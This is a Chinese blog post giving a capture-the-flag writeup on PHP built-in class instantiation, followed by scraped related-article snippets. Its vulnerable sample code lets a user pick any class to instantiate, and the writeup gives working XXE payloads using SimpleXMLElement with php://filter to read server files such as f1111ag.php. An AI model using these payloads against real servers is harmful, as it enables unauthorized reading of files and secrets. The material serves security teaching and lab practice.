PHP内置类利用

于 2025-02-27 22:29:02 发布
阅读量307 收藏 5
点赞数 3
CC 4.0 BY-SA版权
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asdfaa/article/details/125938400

[题目信息]:

题目名称题目难度
PHP内置类利用3

[题目考点]:

PHP内置类利用

[Flag格式]:

SXF{XxA_aSQ_XXE}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

docker-compose up -d

[题目writeup]:

1、实验主页

2、代码解析

<?php
class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(   #1
    function ($class){
        new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name']:null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if (class_exists($classname)){ #2
    $newclass = new $classname($param,$param2); #3
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'$value'.'<br>';
}
?>

上述代码中存在3个用户可控参数,$classname、$param、$param2。其中$classname在#2被传入class_exists函数。

首先介绍class_exists函数和__autoload函数以及PHP中任意类实例化

uploading.4e448015.gif正在上传…重新上传取消

如上图所示,如果检查的类不存在,那么class_exists()函数就会去调用__autoload函数。

在代码中不存在autoload函数,但#1行,存在spl_autoload_register函数,其作用和autoload函数类似。

通过spl_autoload_register函数可以实例化php中任意类

SimpleXMLElement类功能就是用来表示XML文档中的元素。在SimpleXMLElement类中有很多函数可以调用。

重点是SimpleXMLElement::__construct-创建新的SimpleXMLElement对象

SimpleXMLElement::addAttribute-向SimpleXML元素添加属性
SimpleXMLElement::addChild-向XML节点添加子元素
SimpleXMLElement::asXML-基于SimpleXML元素返回格式良好的XML字符串
SimpleXMLElement::attributes-标识元素的属性
SimpleXMLElement::children-查找给定节点的子节点
SimpleXMLElement::__construct-创建新的SimpleXMLElement对象
SimpleXMLElement::count-计算元素的子级
ExtSimpleNamespaces::GetDocElement-在文档命名空间中声明
SimpleXMLElement::getName-获取XML元素的名称
SimpleXMLElement::getNamespaces-返回文档中使用的命名空间
SimpleXMLElement::registerXPathNamespace-为下一个XPath查询创建前缀/ns上下文
SimpleXMLElement::saveXML-别名SimpleXMLElement::asXML
SimpleXMLElement::__toString -返回字符串内容
SimpleXMLElement::xpath-对XML数据运行XPath查询

<?php
$xml = file_get_contents("php://input");
$xml_class= new SimpleXMLElement($xml,LIBXML_NOENT);
var_dump($xml_class);
?>
exp:
<?xml version = "1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=123.txt">
]>
<x>&xxe;</x>

在#3行,这里的类和类里面的参数都是我们可以控制的,满足了上面咱们提到的实例化漏洞。也就是说,我们可以实例化PHP的任意内置类。

首先可以使用GlobIterator类来寻找目录下各个文件的名字

GlobIterator类第一个参数是必须的的,也就是搜索的文件名,第二个参数为搜索。

通过搜索发现f1111ag.php文件,下一步使用SimpleXMLElement类读取f1111ag.php文件。

?name=SimpleXMLElement&param=<?xml%20version="1.0"?><!DOCTYPE%20ANY%20[<!ENTITY%20xxe%20SYSTEM%20"php://filter/read=convert.base64-encode/resource=f1111ag.php">]><x>%26xxe;</x>&param2=2

通过 BASE64解码获取Flag内容。

利用PHP内置SERVER开启web服务(本地开发使用)
10-15
**PHP内置服务器详解** 自PHP 5.4.0版本起,CLI SAPI(命令行接口)引入了一个非常实用的功能,即内置的Web服务器。这个轻量级的服务器设计初衷是为了方便开发者在本地环境中快速测试PHP应用,而不适用于生产环境。...
PHP封装的svn类使用内置svn函数实现根据svn版本号导出相关文件示例
10-18
标题直接指出该类库利用PHP内置的svn函数,暗示了这篇文章将会涉及PHP与svn集成的深入应用。而“根据svn版本号导出文件”则意味着文章会包含对svn版本控制机制的理解,以及如何在PHP中操作这些机制以实现文件的...
php内置类小结
leekos的博客,分享web安全相关知识~
05-31 1536
PHP内置类 SoapClient 是一个专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端。Error类是php的一个内置类,通常用于自定义一个Error,在php7版本后适用,可能存在xss漏洞,因为内置了一个。类也是可以遍历一个文件目录,使用方法与前两个类也基本相似。看了一下文档发现该原生类是继承FilesystemIterator的,所以也是以绝对路径显示的。(需要注意的是,我们使用GlobIterator只需要输入路径即可,不需要添加glob://)
PHP原生类
qq_63928796的博客
11-09 1347
原生类就是php内置类,不用定义php自带的类,即不需要在当前脚本写出,但也可以实例化的类我们可以通过脚本找一下php原生类
php 内置,php 内置标准类
weixin_42593701的博客
03-10 288
PHP中,有很多“现成的类”,其中有一个被称为“内置标准类”。这个类“内部”可以认为什么也没有。class stdclass{ }1$obj1 = new stdclass();var_dump($obj1);class A{}$obj2 = new A();var_dump($obj2);?>12345678运行结果:object(stdClass)[1]object(A)[2]123可以...
[极客大挑战 2020]Greatphp (php 内置类
qq_62046696的博客
12-20 1509
闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。PHP7中,可以在echo时触发__toString,来构造XSS。
如何利用内置PHP灵活性执行外部程序.pdf
11-03
"利用内置PHP灵活性执行外部程序" 本文主要介绍了如何利用内置PHP灵活性执行外部程序。PHP作为一种多功能的语言,提供了多种方式来执行外部程序。在本文中,我们将介绍使用反引号运算符、exec()函数和passthru()...
Shell脚本实现启动PHP内置FastCGI Server
09-15
在本文中,我们将深入探讨如何使用Shell脚本来启动PHP内置的FastCGI服务器,这是在没有php-fpm等专用进程管理器的情况下,为PHP提供FastCGI服务的一种方法。FastCGI是一种协议,用于在Web服务器(如Nginx)和动态...
php中类与类之间调用_PHP保留类及特殊类
weixin_39711441的博客
11-27 3366
php中文网最新课程每日17点准时技术干货分享在面向对象语言中,都会内置一些语言内置提供的基本功能类,比如JavaScript中的Array,Number等类,PHP中也有很多这种类,比如Directory,stdClass,Exception等类,同时一些标准扩展比如PDO等扩展中也会定义一些类,PHP中类是不允许重复定义的,所以在编写代码时不允许定义已经存在的类。同时PHP中有一些特...
PHP内置的PDO类
luzhenju的博客
06-20 1157
PHP PDO 的 概述 随着php应用的快速发展和通过php开发跨平台的应用,使用不同的数据库是十分常见的。Php需要支持从mysql、mssql到oracle数据库的多种数据库,为了不局限于单一,更好的增添php程序在数据库方面的灵活性,衍生出了PDO。 Pdo就是php中最为主流的实现“数据库抽象层”的数据库抽象类,是php5中最为突出的功能之一。 特性 1、灵活性,可以在PHP运行期间直接...
PHP内置对象
韩梦希的博客
10-12 1401
日期函数1、date()函数    格式化一个本地时间/日期,返回将整数timestamp按照给定的格式字串而产生的字符串。     常用参数: Y:4位数的年份 n:表示月份没有前导0 1-12 j:表示月份中第几天没没有前导0 1-31 m:数字表示的月份,有前导零 01 到 12 d:月份中的第几天,有前导零的 2 位数字 01 到 31 H:代表24小时的格式有前
PHP内置异常
荣耀之路
06-30 932
PHP内置异常
php内置类
weixin_30389003的博客
07-04 354
PHP的一些内置类:- dir- PDO- Memcache- DOM -exception 转载于:https://www.cnblogs.com/best-jobs/archive/2012/07/04/2576412.html
php内置类,yii2学习教程之5种内置行为类详解
weixin_42352842的博客
03-10 477
前言众所周知学习所有知识都需要循序渐进,行为也是一样,在我们学会很牛逼的新建行为,然后轻松注入到组件类之前,先看看yii2框架为我们准备的5个内置的行为类,也许你刚要用到~话不多说了,来一起看看详细的介绍:本节的目的是让各位小伙伴在使用过程中对行为有一个整体上的感觉。先亮亮相TimestampBehaviorSluggableBehaviorBlameableBehaviorAttributeTy...
php 内置标准类
anwu8133的博客
05-24 472
PHP中,有很多“现成的类”,其中有一个被称为“内置标准类”。这个类“内部”可以认为什么也没有。 class stdclass{ }1<?php$obj1 = new stdclass();var_dump($obj1); class A{}$obj2 = new A();var_dump($obj2);?>12345678  运行结果: object(stdClass...
PHP内置标准类
weixin_34304013的博客
08-17 241
PHP内置标准类 php语言内部,有“很多现成的类”,其中有一个,被称为“内置标准类”。 这个类“内部”可以认为什么都没有,类似这样: class stdclass{ } 其作用,可以用于存储一些临时的简单的数据: $obj1->pp1 = 1; $obj1->port = ‘3306’; 也可以用于类型转换时用于存储数据,如下节所示 转载于:http...
内置类与静态内置类
venus321的博客
03-01 1043
我们首先看看内置类和静态内枝类的区别,其实我们光从这个名字还不太容易高明白,下面是截取的网上的,理解起来还容易一点。 从字面上看,一个被称为静态嵌套类,一个被称为内部类。从字面的角度解释是这样的:什么是嵌套?嵌套就是我跟你没关系,自己可以完全独立存在,但是我就想借你的壳用一下,来隐藏一下我自己。什么是内部?内部就是我是你的一部分,我了解你,我知道你的全部,没有你就没有我。(所以内部类对象是以外部...
php 内置类
最新发布
03-21
<think>好的,用户想了解PHP内置类及其用法。首先,我需要回忆PHP中有哪些常用的内置类,并整理它们的用途和基本用法。可能需要提到像DateTime、DirectoryIterator、SplFileObject、Exception这样的类。 首先,DateTime类,用于处理日期和时间,应该举例说明如何实例化、格式化以及进行日期计算。比如创建对象、设置时区、加减时间间隔等。 接下来是DirectoryIterator,这个类用于遍历目录,可以检查文件信息,比如是否是文件、目录,获取文件名、大小等属性。需要给出一个简单的遍历目录的例子。 然后是SplFileObject,用于文件操作,比如逐行读取文件内容。可以对比传统的fopen方法,说明其面向对象的优势。 异常处理类Exception及其子类,比如InvalidArgumentException,这里需要说明如何在自定义异常中使用它们,以及try-catch块的基本结构。 另外,用户提供的引用中提到了FutureWarning和__builtin_extend_pointer,但这些似乎和PHP无关,可能是用户混淆了其他语言的内容。需要指出这一点,避免误导用户。 在回答时要注意结构清晰,每个类单独说明,并附上代码示例。同时,确保使用正确的中文术语,避免技术术语错误。最后生成相关问题,帮助用户进一步学习,比如内置类的扩展、最佳实践、异常处理机制等。 检查是否有遗漏的重要内置类,比如PDO(数据库交互)、ArrayObject等,但考虑到用户可能更常用到文件、日期和异常处理,先重点介绍这几个。如果有时间,可以简要提及其他类,但保持回答简洁。 最后,确保所有代码示例符合PHP语法,比如使用正确的箭头语法->,以及命名空间(如果有的话)。比如DateTime的例子中可能需要使用DateTimeZone类来设置时区。 总结回答的结构:简介每个类,代码示例,注意事项或常见用法,然后相关问题。同时纠正用户引用中不相关的内容,避免混淆。</think>### PHP内置类及其用法详解 PHP提供了丰富的内置类,覆盖文件操作、日期处理、异常捕获等场景。以下是几个核心内置类的详细说明及代码示例: --- #### 1. **DateTime(日期时间处理)** 用于精确处理日期时间计算和格式化,支持时区设置。 ```php // 创建当前时间对象 $date = new DateTime(); echo $date->format('Y-m-d H:i:s'); // 输出:2023-08-01 15:30:00 // 修改时区 $date->setTimezone(new DateTimeZone('Asia/Shanghai')); // 时间计算 $interval = new DateInterval('P10D'); // 增加10天 $date->add($interval); ``` --- #### 2. **DirectoryIterator(目录遍历)** 轻量级目录遍历工具,无需预加载全部文件信息。 ```php $dir = new DirectoryIterator('/path/to/directory'); foreach ($dir as $fileinfo) { if (!$fileinfo->isDot()) { echo $fileinfo->getFilename() . " (大小:" . $fileinfo->getSize() . "字节)\n"; } } ``` --- #### 3. **SplFileObject(文件读写)** 面向对象的文件操作类,支持逐行读取。 ```php $file = new SplFileObject('data.txt', 'r'); while (!$file->eof()) { echo $file->fgets(); // 逐行读取 } // 写入文件需使用SplFileObject的写模式 ``` --- #### 4. **Exception(异常处理基类)** 所有异常类的基类,支持自定义异常类型。 ```php class CustomException extends Exception {} try { if ($value < 0) { throw new InvalidArgumentException("值必须非负"); } } catch (InvalidArgumentException $e) { error_log("参数错误: " . $e->getMessage()); } ``` --- ### 注意事项 - 用户提供的引用`__builtin_extend_pointer`属于C语言特性[^1],与PHP无关 - `FutureWarning`是Python的警告类型[^2],PHP通过`trigger_error()`实现类似功能 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值